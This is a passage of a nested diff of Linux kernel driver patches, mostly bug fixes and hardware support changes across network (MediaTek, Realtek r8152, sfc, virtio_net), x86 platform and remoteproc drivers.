+ 		if (match.mask->flags & FLOW_DIS_IS_FRAGMENT) {
+ 			if (ntohs(flow_spec->etype) == ETH_P_IP) {
+ 				flow_spec->ip_flag = IPV4_FLAG_MORE;
+-				flow_mask->ip_flag = 0xff;
++				flow_mask->ip_flag = IPV4_FLAG_MORE;
+ 				req->features |= BIT_ULL(NPC_IPFRAG_IPV4);
+ 			} else if (ntohs(flow_spec->etype) == ETH_P_IPV6) {
+ 				flow_spec->next_header = IPPROTO_FRAGMENT;
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c
+index ab126f8706c74..53366dbfbf27c 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c
+@@ -621,7 +621,7 @@ static int otx2vf_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 
+ 	err = otx2vf_realloc_msix_vectors(vf);
+ 	if (err)
+-		goto err_mbox_destroy;
++		goto err_detach_rsrc;
+ 
+ 	err = otx2_set_real_num_queues(netdev, qcount, qcount);
+ 	if (err)
+diff --git a/drivers/net/ethernet/mediatek/mtk_eth_soc.c b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
+index f56d4e7d4ae5d..4671d738a37c7 100644
+--- a/drivers/net/ethernet/mediatek/mtk_eth_soc.c
++++ b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
+@@ -1870,9 +1870,7 @@ static int mtk_poll_rx(struct napi_struct *napi, int budget,
+ 
+ 	while (done < budget) {
+ 		unsigned int pktlen, *rxdcsum;
+-		bool has_hwaccel_tag = false;
+ 		struct net_device *netdev;
+-		u16 vlan_proto, vlan_tci;
+ 		dma_addr_t dma_addr;
+ 		u32 hash, reason;
+ 		int mac = 0;
+@@ -2007,31 +2005,16 @@ static int mtk_poll_rx(struct napi_struct *napi, int budget,
+ 			skb_checksum_none_assert(skb);
+ 		skb->protocol = eth_type_trans(skb, netdev);
+ 
+-		if (netdev->features & NETIF_F_HW_VLAN_CTAG_RX) {
+-			if (MTK_HAS_CAPS(eth->soc->caps, MTK_NETSYS_V2)) {
+-				if (trxd.rxd3 & RX_DMA_VTAG_V2) {
+-					vlan_proto = RX_DMA_VPID(trxd.rxd4);
+-					vlan_tci = RX_DMA_VID(trxd.rxd4);
+-					has_hwaccel_tag = true;
+-				}
+-			} else if (trxd.rxd2 & RX_DMA_VTAG) {
+-				vlan_proto = RX_DMA_VPID(trxd.rxd3);
+-				vlan_tci = RX_DMA_VID(trxd.rxd3);
+-				has_hwaccel_tag = true;
+-			}
+-		}
+-
+ 		/* When using VLAN untagging in combination with DSA, the
+ 		 * hardware treats the MTK special tag as a VLAN and untags it.
+ 		 */
+-		if (has_hwaccel_tag && netdev_uses_dsa(netdev)) {
+-			unsigned int port = vlan_proto & GENMASK(2, 0);
++		if (!MTK_HAS_CAPS(eth->soc->caps, MTK_NETSYS_V2) &&
++		    (trxd.rxd2 & RX_DMA_VTAG) && netdev_uses_dsa(netdev)) {
++			unsigned int port = RX_DMA_VPID(trxd.rxd3) & GENMASK(2, 0);
+ 
+ 			if (port < ARRAY_SIZE(eth->dsa_meta) &&
+ 			    eth->dsa_meta[port])
+ 				skb_dst_set_noref(skb, &eth->dsa_meta[port]->dst);
+-		} else if (has_hwaccel_tag) {
+-			__vlan_hwaccel_put_tag(skb, htons(vlan_proto), vlan_tci);
+ 		}
+ 
+ 		if (reason == MTK_PPE_CPU_REASON_HIT_UNBIND_RATE_REACHED)
+@@ -2859,29 +2842,11 @@ static netdev_features_t mtk_fix_features(struct net_device *dev,
+ 
+ static int mtk_set_features(struct net_device *dev, netdev_features_t features)
+ {
+-	struct mtk_mac *mac = netdev_priv(dev);
+-	struct mtk_eth *eth = mac->hw;
+ 	netdev_features_t diff = dev->features ^ features;
+-	int i;
+ 
+ 	if ((diff & NETIF_F_LRO) && !(features & NETIF_F_LRO))
+ 		mtk_hwlro_netdev_disable(dev);
+ 
+-	/* Set RX VLAN offloading */
+-	if (!(diff & NETIF_F_HW_VLAN_CTAG_RX))
+-		return 0;
+-
+-	mtk_w32(eth, !!(features & NETIF_F_HW_VLAN_CTAG_RX),
+-		MTK_CDMP_EG_CTRL);
+-
+-	/* sync features with other MAC */
+-	for (i = 0; i < MTK_MAC_COUNT; i++) {
+-		if (!eth->netdev[i] || eth->netdev[i] == dev)
+-			continue;
+-		eth->netdev[i]->features &= ~NETIF_F_HW_VLAN_CTAG_RX;
+-		eth->netdev[i]->features |= features & NETIF_F_HW_VLAN_CTAG_RX;
+-	}
+-
+ 	return 0;
+ }
+ 
+@@ -3184,30 +3149,6 @@ static int mtk_open(struct net_device *dev)
+ 	struct mtk_eth *eth = mac->hw;
+ 	int i, err;
+ 
+-	if (mtk_uses_dsa(dev) && !eth->prog) {
+-		for (i = 0; i < ARRAY_SIZE(eth->dsa_meta); i++) {
+-			struct metadata_dst *md_dst = eth->dsa_meta[i];
+-
+-			if (md_dst)
+-				continue;
+-
+-			md_dst = metadata_dst_alloc(0, METADATA_HW_PORT_MUX,
+-						    GFP_KERNEL);
+-			if (!md_dst)
+-				return -ENOMEM;
+-
+-			md_dst->u.port_info.port_id = i;
+-			eth->dsa_meta[i] = md_dst;
+-		}
+-	} else {
+-		/* Hardware special tag parsing needs to be disabled if at least
+-		 * one MAC does not use DSA.
+-		 */
+-		u32 val = mtk_r32(eth, MTK_CDMP_IG_CTRL);
+-		val &= ~MTK_CDMP_STAG_EN;
+-		mtk_w32(eth, val, MTK_CDMP_IG_CTRL);
+-	}
+-
+ 	err = phylink_of_phy_connect(mac->phylink, mac->of_node, 0);
+ 	if (err) {
+ 		netdev_err(dev, "%s: could not attach PHY: %d\n", __func__,
+@@ -3246,6 +3187,40 @@ static int mtk_open(struct net_device *dev)
+ 	phylink_start(mac->phylink);
+ 	netif_tx_start_all_queues(dev);
+ 
++	if (MTK_HAS_CAPS(eth->soc->caps, MTK_NETSYS_V2))
++		return 0;
++
++	if (mtk_uses_dsa(dev) && !eth->prog) {
++		for (i = 0; i < ARRAY_SIZE(eth->dsa_meta); i++) {
++			struct metadata_dst *md_dst = eth->dsa_meta[i];
++
++			if (md_dst)
++				continue;
++
++			md_dst = metadata_dst_alloc(0, METADATA_HW_PORT_MUX,
++						    GFP_KERNEL);
++			if (!md_dst)
++				return -ENOMEM;
++
++			md_dst->u.port_info.port_id = i;
++			eth->dsa_meta[i] = md_dst;
++		}
++	} else {
++		/* Hardware special tag parsing needs to be disabled if at least
++		 * one MAC does not use DSA.
++		 */
++		u32 val = mtk_r32(eth, MTK_CDMP_IG_CTRL);
++
++		val &= ~MTK_CDMP_STAG_EN;
++		mtk_w32(eth, val, MTK_CDMP_IG_CTRL);
++
++		val = mtk_r32(eth, MTK_CDMQ_IG_CTRL);
++		val &= ~MTK_CDMQ_STAG_EN;
++		mtk_w32(eth, val, MTK_CDMQ_IG_CTRL);
++
++		mtk_w32(eth, 0, MTK_CDMP_EG_CTRL);
++	}
++
+ 	return 0;
+ }
+ 
+@@ -3572,10 +3547,9 @@ static int mtk_hw_init(struct mtk_eth *eth)
+ 	if (!MTK_HAS_CAPS(eth->soc->caps, MTK_NETSYS_V2)) {
+ 		val = mtk_r32(eth, MTK_CDMP_IG_CTRL);
+ 		mtk_w32(eth, val | MTK_CDMP_STAG_EN, MTK_CDMP_IG_CTRL);
+-	}
+ 
+-	/* Enable RX VLan Offloading */
+-	mtk_w32(eth, 1, MTK_CDMP_EG_CTRL);
++		mtk_w32(eth, 1, MTK_CDMP_EG_CTRL);
++	}
+ 
+ 	/* set interrupt delays based on current Net DIM sample */
+ 	mtk_dim_rx(&eth->rx_dim.work);
+@@ -4176,7 +4150,7 @@ static int mtk_add_mac(struct mtk_eth *eth, struct device_node *np)
+ 		eth->netdev[id]->hw_features |= NETIF_F_LRO;
+ 
+ 	eth->netdev[id]->vlan_features = eth->soc->hw_features &
+-		~(NETIF_F_HW_VLAN_CTAG_TX | NETIF_F_HW_VLAN_CTAG_RX);
++		~NETIF_F_HW_VLAN_CTAG_TX;
+ 	eth->netdev[id]->features |= eth->soc->hw_features;
+ 	eth->netdev[id]->ethtool_ops = &mtk_ethtool_ops;
+ 
+diff --git a/drivers/net/ethernet/mediatek/mtk_eth_soc.h b/drivers/net/ethernet/mediatek/mtk_eth_soc.h
+index d4b4f9eaa4419..79112bd3e952e 100644
+--- a/drivers/net/ethernet/mediatek/mtk_eth_soc.h
++++ b/drivers/net/ethernet/mediatek/mtk_eth_soc.h
+@@ -48,7 +48,6 @@
+ #define MTK_HW_FEATURES		(NETIF_F_IP_CSUM | \
+ 				 NETIF_F_RXCSUM | \
+ 				 NETIF_F_HW_VLAN_CTAG_TX | \
+-				 NETIF_F_HW_VLAN_CTAG_RX | \
+ 				 NETIF_F_SG | NETIF_F_TSO | \
+ 				 NETIF_F_TSO6 | \
+ 				 NETIF_F_IPV6_CSUM |\
+diff --git a/drivers/net/ethernet/pensando/ionic/ionic_devlink.c b/drivers/net/ethernet/pensando/ionic/ionic_devlink.c
+index e6ff757895abb..4ec66a6be0738 100644
+--- a/drivers/net/ethernet/pensando/ionic/ionic_devlink.c
++++ b/drivers/net/ethernet/pensando/ionic/ionic_devlink.c
+@@ -61,6 +61,8 @@ struct ionic *ionic_devlink_alloc(struct device *dev)
+ 	struct devlink *dl;
+ 
+ 	dl = devlink_alloc(&ionic_dl_ops, sizeof(struct ionic), dev);
++	if (!dl)
++		return NULL;
+ 
+ 	return devlink_priv(dl);
+ }
+diff --git a/drivers/net/ethernet/pensando/ionic/ionic_ethtool.c b/drivers/net/ethernet/pensando/ionic/ionic_ethtool.c
+index 01c22701482d9..d7370fb60a168 100644
+--- a/drivers/net/ethernet/pensando/ionic/ionic_ethtool.c
++++ b/drivers/net/ethernet/pensando/ionic/ionic_ethtool.c
+@@ -691,7 +691,7 @@ static int ionic_get_rxnfc(struct net_device *netdev,
+ 		info->data = lif->nxqs;
+ 		break;
+ 	default:
+-		netdev_err(netdev, "Command parameter %d is not supported\n",
++		netdev_dbg(netdev, "Command parameter %d is not supported\n",
+ 			   info->cmd);
+ 		err = -EOPNOTSUPP;
+ 	}
+diff --git a/drivers/net/ethernet/sfc/mcdi_port_common.c b/drivers/net/ethernet/sfc/mcdi_port_common.c
+index 899cc16710048..0ab14f3d01d4d 100644
+--- a/drivers/net/ethernet/sfc/mcdi_port_common.c
++++ b/drivers/net/ethernet/sfc/mcdi_port_common.c
+@@ -972,12 +972,15 @@ static u32 efx_mcdi_phy_module_type(struct efx_nic *efx)
+ 
+ 	/* A QSFP+ NIC may actually have an SFP+ module attached.
+ 	 * The ID is page 0, byte 0.
++	 * QSFP28 is of type SFF_8636, however, this is treated
++	 * the same by ethtool, so we can also treat them the same.
+ 	 */
+ 	switch (efx_mcdi_phy_get_module_eeprom_byte(efx, 0, 0)) {
+-	case 0x3:
++	case 0x3: /* SFP */
+ 		return MC_CMD_MEDIA_SFP_PLUS;
+-	case 0xc:
+-	case 0xd:
++	case 0xc: /* QSFP */
++	case 0xd: /* QSFP+ */
++	case 0x11: /* QSFP28 */
+ 		return MC_CMD_MEDIA_QSFP_PLUS;
+ 	default:
+ 		return 0;
+@@ -1075,7 +1078,7 @@ int efx_mcdi_phy_get_module_info(struct efx_nic *efx, struct ethtool_modinfo *mo
+ 
+ 	case MC_CMD_MEDIA_QSFP_PLUS:
+ 		modinfo->type = ETH_MODULE_SFF_8436;
+-		modinfo->eeprom_len = ETH_MODULE_SFF_8436_LEN;
++		modinfo->eeprom_len = ETH_MODULE_SFF_8436_MAX_LEN;
+ 		break;
+ 
+ 	default:
+diff --git a/drivers/net/usb/r8152.c b/drivers/net/usb/r8152.c
+index 23da1d9dafd1f..059d610901d84 100644
+--- a/drivers/net/usb/r8152.c
++++ b/drivers/net/usb/r8152.c
+@@ -199,6 +199,7 @@
+ #define OCP_EEE_AR		0xa41a
+ #define OCP_EEE_DATA		0xa41c
+ #define OCP_PHY_STATUS		0xa420
++#define OCP_INTR_EN		0xa424
+ #define OCP_NCTL_CFG		0xa42c
+ #define OCP_POWER_CFG		0xa430
+ #define OCP_EEE_CFG		0xa432
+@@ -620,6 +621,9 @@ enum spd_duplex {
+ #define PHY_STAT_LAN_ON		3
+ #define PHY_STAT_PWRDN		5
+ 
++/* OCP_INTR_EN */
++#define INTR_SPEED_FORCE	BIT(3)
++
+ /* OCP_NCTL_CFG */
+ #define PGA_RETURN_EN		BIT(1)
+ 
+@@ -3023,12 +3027,16 @@ static int rtl_enable(struct r8152 *tp)
+ 	ocp_write_byte(tp, MCU_TYPE_PLA, PLA_CR, ocp_data);
+ 
+ 	switch (tp->version) {
+-	case RTL_VER_08:
+-	case RTL_VER_09:
+-	case RTL_VER_14:
+-		r8153b_rx_agg_chg_indicate(tp);
++	case RTL_VER_01:
++	case RTL_VER_02:
++	case RTL_VER_03:
++	case RTL_VER_04:
++	case RTL_VER_05:
++	case RTL_VER_06:
++	case RTL_VER_07:
+ 		break;
+ 	default:
++		r8153b_rx_agg_chg_indicate(tp);
+ 		break;
+ 	}
+ 
+@@ -3082,7 +3090,6 @@ static void r8153_set_rx_early_timeout(struct r8152 *tp)
+ 			       640 / 8);
+ 		ocp_write_word(tp, MCU_TYPE_USB, USB_RX_EXTRA_AGGR_TMR,
+ 			       ocp_data);
+-		r8153b_rx_agg_chg_indicate(tp);
+ 		break;
+ 
+ 	default:
+@@ -3116,7 +3123,6 @@ static void r8153_set_rx_early_size(struct r8152 *tp)
+ 	case RTL_VER_15:
+ 		ocp_write_word(tp, MCU_TYPE_USB, USB_RX_EARLY_SIZE,
+ 			       ocp_data / 8);
+-		r8153b_rx_agg_chg_indicate(tp);
+ 		break;
+ 	default:
+ 		WARN_ON_ONCE(1);
+@@ -5986,6 +5992,25 @@ static void rtl8153_disable(struct r8152 *tp)
+ 	r8153_aldps_en(tp, true);
+ }
+ 
++static u32 fc_pause_on_auto(struct r8152 *tp)
++{
++	return (ALIGN(mtu_to_size(tp->netdev->mtu), 1024) + 6 * 1024);
++}
++
++static u32 fc_pause_off_auto(struct r8152 *tp)
++{
++	return (ALIGN(mtu_to_size(tp->netdev->mtu), 1024) + 14 * 1024);
++}
++
++static void r8156_fc_parameter(struct r8152 *tp)
++{
++	u32 pause_on = tp->fc_pause_on ? tp->fc_pause_on : fc_pause_on_auto(tp);
++	u32 pause_off = tp->fc_pause_off ? tp->fc_pause_off : fc_pause_off_auto(tp);
++
++	ocp_write_word(tp, MCU_TYPE_PLA, PLA_RX_FIFO_FULL, pause_on / 16);
++	ocp_write_word(tp, MCU_TYPE_PLA, PLA_RX_FIFO_EMPTY, pause_off / 16);
++}
++
+ static int rtl8156_enable(struct r8152 *tp)
+ {
+ 	u32 ocp_data;
+@@ -5994,6 +6019,7 @@ static int rtl8156_enable(struct r8152 *tp)
+ 	if (test_bit(RTL8152_UNPLUG, &tp->flags))
+ 		return -ENODEV;
+ 
++	r8156_fc_parameter(tp);
+ 	set_tx_qlen(tp);
+ 	rtl_set_eee_plus(tp);
+ 	r8153_set_rx_early_timeout(tp);
+@@ -6025,9 +6051,24 @@ static int rtl8156_enable(struct r8152 *tp)
+ 		ocp_write_word(tp, MCU_TYPE_USB, USB_L1_CTRL, ocp_data);
+ 	}
+ 
++	ocp_data = ocp_read_word(tp, MCU_TYPE_USB, USB_FW_TASK);
++	ocp_data &= ~FC_PATCH_TASK;
++	ocp_write_word(tp, MCU_TYPE_USB, USB_FW_TASK, ocp_data);
++	usleep_range(1000, 2000);
++	ocp_data |= FC_PATCH_TASK;
++	ocp_write_word(tp, MCU_TYPE_USB, USB_FW_TASK, ocp_data);
++
+ 	return rtl_enable(tp);
+ }
+ 
++static void rtl8156_disable(struct r8152 *tp)
++{
++	ocp_write_word(tp, MCU_TYPE_PLA, PLA_RX_FIFO_FULL, 0);
++	ocp_write_word(tp, MCU_TYPE_PLA, PLA_RX_FIFO_EMPTY, 0);
++
++	rtl8153_disable(tp);
++}
++
+ static int rtl8156b_enable(struct r8152 *tp)
+ {
+ 	u32 ocp_data;
+@@ -6429,25 +6470,6 @@ static void rtl8153c_up(struct r8152 *tp)
+ 	r8153b_u1u2en(tp, true);
+ }
+ 
+-static inline u32 fc_pause_on_auto(struct r8152 *tp)
+-{
+-	return (ALIGN(mtu_to_size(tp->netdev->mtu), 1024) + 6 * 1024);
+-}
+-
+-static inline u32 fc_pause_off_auto(struct r8152 *tp)
+-{
+-	return (ALIGN(mtu_to_size(tp->netdev->mtu), 1024) + 14 * 1024);
+-}
+-
+-static void r8156_fc_parameter(struct r8152 *tp)
+-{
+-	u32 pause_on = tp->fc_pause_on ? tp->fc_pause_on : fc_pause_on_auto(tp);
+-	u32 pause_off = tp->fc_pause_off ? tp->fc_pause_off : fc_pause_off_auto(tp);
+-
+-	ocp_write_word(tp, MCU_TYPE_PLA, PLA_RX_FIFO_FULL, pause_on / 16);
+-	ocp_write_word(tp, MCU_TYPE_PLA, PLA_RX_FIFO_EMPTY, pause_off / 16);
+-}
+-
+ static void rtl8156_change_mtu(struct r8152 *tp)
+ {
+ 	u32 rx_max_size = mtu_to_size(tp->netdev->mtu);
+@@ -7538,6 +7560,11 @@ static void r8156_hw_phy_cfg(struct r8152 *tp)
+ 				      ((swap_a & 0x1f) << 8) |
+ 				      ((swap_a >> 8) & 0x1f));
+ 		}
++
++		/* Notify the MAC when the speed is changed to force mode. */
++		data = ocp_reg_read(tp, OCP_INTR_EN);
++		data |= INTR_SPEED_FORCE;
++		ocp_reg_write(tp, OCP_INTR_EN, data);
+ 		break;
+ 	default:
+ 		break;
+@@ -7933,6 +7960,11 @@ static void r8156b_hw_phy_cfg(struct r8152 *tp)
+ 		break;
+ 	}
+ 
++	/* Notify the MAC when the speed is changed to force mode. */
++	data = ocp_reg_read(tp, OCP_INTR_EN);
++	data |= INTR_SPEED_FORCE;
++	ocp_reg_write(tp, OCP_INTR_EN, data);
++
+ 	if (rtl_phy_patch_request(tp, true, true))
+ 		return;
+ 
+@@ -9377,7 +9409,7 @@ static int rtl_ops_init(struct r8152 *tp)
+ 	case RTL_VER_10:
+ 		ops->init		= r8156_init;
+ 		ops->enable		= rtl8156_enable;
+-		ops->disable		= rtl8153_disable;
++		ops->disable		= rtl8156_disable;
+ 		ops->up			= rtl8156_up;
+ 		ops->down		= rtl8156_down;
+ 		ops->unload		= rtl8153_unload;
+diff --git a/drivers/net/virtio_net.c b/drivers/net/virtio_net.c
+index 0644069592211..259d54b229bf1 100644
+--- a/drivers/net/virtio_net.c
++++ b/drivers/net/virtio_net.c
+@@ -3411,12 +3411,14 @@ static void free_unused_bufs(struct virtnet_info *vi)
+ 		struct virtqueue *vq = vi->sq[i].vq;
+ 		while ((buf = virtqueue_detach_unused_buf(vq)) != NULL)
+ 			virtnet_sq_free_unused_buf(vq, buf);
++		cond_resched();
+ 	}
+ 
+ 	for (i = 0; i < vi->max_queue_pairs; i++) {
+ 		struct virtqueue *vq = vi->rq[i].vq;
+ 		while ((buf = virtqueue_detach_unused_buf(vq)) != NULL)
+ 			virtnet_rq_free_unused_buf(vq, buf);
++		cond_resched();
+ 	}
+ }
+ 
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/d3.c b/drivers/net/wireless/intel/iwlwifi/mvm/d3.c
+index 29f75948ab00c..fe2de813fbf49 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/d3.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/d3.c
+@@ -2715,6 +2715,7 @@ static bool iwl_mvm_wait_d3_notif(struct iwl_notif_wait_data *notif_wait,
+ 			break;
+ 		}
+ 
++
+ 		d3_data->notif_received |= IWL_D3_NOTIF_WOWLAN_INFO;
+ 		len = iwl_rx_packet_payload_len(pkt);
+ 		iwl_mvm_parse_wowlan_info_notif(mvm, notif, d3_data->status,
+diff --git a/drivers/platform/x86/hp/hp-wmi.c b/drivers/platform/x86/hp/hp-wmi.c
+index 2ef201b625b38..3bacee2b8d521 100644
+--- a/drivers/platform/x86/hp/hp-wmi.c
++++ b/drivers/platform/x86/hp/hp-wmi.c
+@@ -211,6 +211,7 @@ struct bios_rfkill2_state {
+ static const struct key_entry hp_wmi_keymap[] = {
+ 	{ KE_KEY, 0x02,    { KEY_BRIGHTNESSUP } },
+ 	{ KE_KEY, 0x03,    { KEY_BRIGHTNESSDOWN } },
++	{ KE_KEY, 0x270,   { KEY_MICMUTE } },
+ 	{ KE_KEY, 0x20e6,  { KEY_PROG1 } },
+ 	{ KE_KEY, 0x20e8,  { KEY_MEDIA } },
+ 	{ KE_KEY, 0x2142,  { KEY_MEDIA } },
+diff --git a/drivers/platform/x86/intel/uncore-frequency/uncore-frequency-common.c b/drivers/platform/x86/intel/uncore-frequency/uncore-frequency-common.c
+index cb24de9e97dc5..fa8f14c925ec3 100644
+--- a/drivers/platform/x86/intel/uncore-frequency/uncore-frequency-common.c
++++ b/drivers/platform/x86/intel/uncore-frequency/uncore-frequency-common.c
+@@ -44,14 +44,18 @@ static ssize_t store_min_max_freq_khz(struct uncore_data *data,
+ 				      int min_max)
+ {
+ 	unsigned int input;
++	int ret;
+ 
+ 	if (kstrtouint(buf, 10, &input))
+ 		return -EINVAL;
+ 
+ 	mutex_lock(&uncore_lock);
+-	uncore_write(data, input, min_max);
++	ret = uncore_write(data, input, min_max);
+ 	mutex_unlock(&uncore_lock);
+ 
++	if (ret)
++		return ret;
++
+ 	return count;
+ }
+ 
+diff --git a/drivers/platform/x86/thinkpad_acpi.c b/drivers/platform/x86/thinkpad_acpi.c
+index 7191ff2625b1e..e40cbe81b12c1 100644
+--- a/drivers/platform/x86/thinkpad_acpi.c
++++ b/drivers/platform/x86/thinkpad_acpi.c
+@@ -10318,6 +10318,7 @@ static atomic_t dytc_ignore_event = ATOMIC_INIT(0);
+ static DEFINE_MUTEX(dytc_mutex);
+ static int dytc_capabilities;
+ static bool dytc_mmc_get_available;
++static int profile_force;
+ 
+ static int convert_dytc_to_profile(int funcmode, int dytcmode,
+ 		enum platform_profile_option *profile)
+@@ -10580,6 +10581,21 @@ static int tpacpi_dytc_profile_init(struct ibm_init_struct *iibm)
+ 	if (err)
+ 		return err;
+ 
++	/* Check if user wants to override the profile selection */
++	if (profile_force) {
++		switch (profile_force) {
++		case -1:
++			dytc_capabilities = 0;
++			break;
++		case 1:
++			dytc_capabilities = BIT(DYTC_FC_MMC);
++			break;
++		case 2:
++			dytc_capabilities = BIT(DYTC_FC_PSC);
++			break;
++		}
++		pr_debug("Profile selection forced: 0x%x\n", dytc_capabilities);
++	}
+ 	if (dytc_capabilities & BIT(DYTC_FC_MMC)) { /* MMC MODE */
+ 		pr_debug("MMC is supported\n");
+ 		/*
+@@ -10593,11 +10609,6 @@ static int tpacpi_dytc_profile_init(struct ibm_init_struct *iibm)
+ 				dytc_mmc_get_available = true;
+ 		}
+ 	} else if (dytc_capabilities & BIT(DYTC_FC_PSC)) { /* PSC MODE */
+-		/* Support for this only works on AMD platforms */
+-		if (boot_cpu_data.x86_vendor != X86_VENDOR_AMD) {
+-			dbg_printk(TPACPI_DBG_INIT, "PSC not support on Intel platforms\n");
+-			return -ENODEV;
+-		}
+ 		pr_debug("PSC is supported\n");
+ 	} else {
+ 		dbg_printk(TPACPI_DBG_INIT, "No DYTC support available\n");
+@@ -11646,6 +11657,9 @@ MODULE_PARM_DESC(uwb_state,
+ 		 "Initial state of the emulated UWB switch");
+ #endif
+ 
++module_param(profile_force, int, 0444);
++MODULE_PARM_DESC(profile_force, "Force profile mode. -1=off, 1=MMC, 2=PSC");
++
+ static void thinkpad_acpi_module_exit(void)
+ {
+ 	struct ibm_struct *ibm, *itmp;
+diff --git a/drivers/platform/x86/touchscreen_dmi.c b/drivers/platform/x86/touchscreen_dmi.c
+index 13802a3c3591d..68e66b60445c3 100644
+--- a/drivers/platform/x86/touchscreen_dmi.c
++++ b/drivers/platform/x86/touchscreen_dmi.c
+@@ -336,6 +336,22 @@ static const struct ts_dmi_data dexp_ursus_7w_data = {
+ 	.properties	= dexp_ursus_7w_props,
+ };
+ 
++static const struct property_entry dexp_ursus_kx210i_props[] = {
++	PROPERTY_ENTRY_U32("touchscreen-min-x", 5),
++	PROPERTY_ENTRY_U32("touchscreen-min-y",  2),
++	PROPERTY_ENTRY_U32("touchscreen-size-x", 1720),
++	PROPERTY_ENTRY_U32("touchscreen-size-y", 1137),
++	PROPERTY_ENTRY_STRING("firmware-name", "gsl1680-dexp-ursus-kx210i.fw"),
++	PROPERTY_ENTRY_U32("silead,max-fingers", 10),
++	PROPERTY_ENTRY_BOOL("silead,home-button"),
++	{ }
++};
++
++static const struct ts_dmi_data dexp_ursus_kx210i_data = {
++	.acpi_name	= "MSSL1680:00",
++	.properties	= dexp_ursus_kx210i_props,
++};
++
+ static const struct property_entry digma_citi_e200_props[] = {
+ 	PROPERTY_ENTRY_U32("touchscreen-size-x", 1980),
+ 	PROPERTY_ENTRY_U32("touchscreen-size-y", 1500),
+@@ -378,6 +394,11 @@ static const struct ts_dmi_data gdix1001_01_upside_down_data = {
+ 	.properties	= gdix1001_upside_down_props,
+ };
+ 
++static const struct ts_dmi_data gdix1002_00_upside_down_data = {
++	.acpi_name	= "GDIX1002:00",
++	.properties	= gdix1001_upside_down_props,
++};
++
+ static const struct property_entry gp_electronic_t701_props[] = {
+ 	PROPERTY_ENTRY_U32("touchscreen-size-x", 960),
+ 	PROPERTY_ENTRY_U32("touchscreen-size-y", 640),
+@@ -1185,6 +1206,14 @@ const struct dmi_system_id touchscreen_dmi_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "7W"),
+ 		},
+ 	},
++	{
++		/* DEXP Ursus KX210i */
++		.driver_data = (void *)&dexp_ursus_kx210i_data,
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "INSYDE Corp."),
++			DMI_MATCH(DMI_PRODUCT_NAME, "S107I"),
++		},
++	},
+ 	{
+ 		/* Digma Citi E200 */
+ 		.driver_data = (void *)&digma_citi_e200_data,
+@@ -1295,6 +1324,18 @@ const struct dmi_system_id touchscreen_dmi_table[] = {
+ 			DMI_MATCH(DMI_BIOS_VERSION, "jumperx.T87.KFBNEEA"),
+ 		},
+ 	},
++	{
++		/* Juno Tablet */
++		.driver_data = (void *)&gdix1002_00_upside_down_data,
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Default string"),
++			/* Both product- and board-name being "Default string" is somewhat rare */
++			DMI_MATCH(DMI_PRODUCT_NAME, "Default string"),
++			DMI_MATCH(DMI_BOARD_NAME, "Default string"),
++			/* Above matches are too generic, add partial bios-version match */
++			DMI_MATCH(DMI_BIOS_VERSION, "JP2V1."),
++		},
++	},
+ 	{
+ 		/* Mediacom WinPad 7.0 W700 (same hw as Wintron surftab 7") */
+ 		.driver_data = (void *)&trekstor_surftab_wintron70_data,
+diff --git a/drivers/remoteproc/imx_dsp_rproc.c b/drivers/remoteproc/imx_dsp_rproc.c
+index 95da1cbefacf0..506ec9565716b 100644
+--- a/drivers/remoteproc/imx_dsp_rproc.c
++++ b/drivers/remoteproc/imx_dsp_rproc.c
+@@ -627,15 +627,19 @@ static int imx_dsp_rproc_add_carveout(struct imx_dsp_rproc *priv)
+ 
+ 		rmem = of_reserved_mem_lookup(it.node);
+ 		if (!rmem) {
++			of_node_put(it.node);
+ 			dev_err(dev, "unable to acquire memory-region\n");
+ 			return -EINVAL;
+ 		}
+ 
+-		if (imx_dsp_rproc_sys_to_da(priv, rmem->base, rmem->size, &da))
++		if (imx_dsp_rproc_sys_to_da(priv, rmem->base, rmem->size, &da)) {
++			of_node_put(it.node);
+ 			return -EINVAL;
++		}
+ 
+ 		cpu_addr = devm_ioremap_wc(dev, rmem->base, rmem->size);
+ 		if (!cpu_addr) {
++			of_node_put(it.node);
+ 			dev_err(dev, "failed to map memory %p\n", &rmem->base);
+ 			return -ENOMEM;
+ 		}
+@@ -644,10 +648,12 @@ static int imx_dsp_rproc_add_carveout(struct imx_dsp_rproc *priv)
+ 		mem = rproc_mem_entry_init(dev, (void __force *)cpu_addr, (dma_addr_t)rmem->base,
+ 					   rmem->size, da, NULL, NULL, it.node->name);
+ 
+-		if (mem)
++		if (mem) {
+ 			rproc_coredump_add_segment(rproc, da, rmem->size);
+-		else
++		} else {
++			of_node_put(it.node);
+ 			return -ENOMEM;
++		}
+ 
+ 		rproc_add_carveout(rproc, mem);
+ 	}
+diff --git a/drivers/remoteproc/imx_rproc.c b/drivers/remoteproc/imx_rproc.c
+index 9fc978e0393ce..0ab840dc7e97f 100644
+--- a/drivers/remoteproc/imx_rproc.c
++++ b/drivers/remoteproc/imx_rproc.c
+@@ -541,6 +541,7 @@ static int imx_rproc_prepare(struct rproc *rproc)
+ 
+ 		rmem = of_reserved_mem_lookup(it.node);
+ 		if (!rmem) {
++			of_node_put(it.node);
+ 			dev_err(priv->dev, "unable to acquire memory-region\n");
+ 			return -EINVAL;
+ 		}
+@@ -553,10 +554,12 @@ static int imx_rproc_prepare(struct rproc *rproc)
+ 					   imx_rproc_mem_alloc, imx_rproc_mem_release,
+ 					   it.node->name);
+ 
+-		if (mem)
++		if (mem) {
+ 			rproc_coredump_add_segment(rproc, da, rmem->size);
+-		else
++		} else {
++			of_node_put(it.node);
+ 			return -ENOMEM;
++		}
+ 
+ 		rproc_add_carveout(rproc, mem);
+ 	}
+diff --git a/drivers/remoteproc/rcar_rproc.c b/drivers/remoteproc/rcar_rproc.c
+index aa86154109c77..1ff2a73ade907 100644
+--- a/drivers/remoteproc/rcar_rproc.c
++++ b/drivers/remoteproc/rcar_rproc.c
